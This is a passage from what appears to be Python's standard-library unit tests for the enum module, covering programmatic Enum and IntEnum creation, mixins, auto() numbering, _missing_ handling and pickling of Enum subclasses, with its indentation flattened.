self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
temp._cls_name = cls
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
class Base2(Enum):
@enum.property
def flash(self):
return 'flashy dynamic'
class Test(Base2):
flash = 1
self.assertEqual(Test.flash.flash, 'flashy dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_wierd(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_missing_exceptions_reset(self):
import gc
import weakref
#
class TestEnum(enum.Enum):
VAL1 = 'val1'
VAL2 = 'val2'
#
class Class1:
def __init__(self):
# Gracefully handle an exception of our own making
try:
raise ValueError()
except ValueError:
pass
#
class Class2:
def __init__(self):
# Gracefully handle an exception of Enum's making
try:
TestEnum('invalid_value')
except ValueError:
pass
# No strong refs here so these are free to die.
class_1_ref = weakref.ref(Class1())
class_2_ref = weakref.ref(Class2())
#
# The exception raised by Enum creates a reference loop and thus
# Class2 instances will stick around until the next garbage collection
# cycle, unlike Class1.
gc.collect() # For PyPy or other GCs.
self.assertIs(class_1_ref(), None)
self.assertIs(class_2_ref(), None)
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
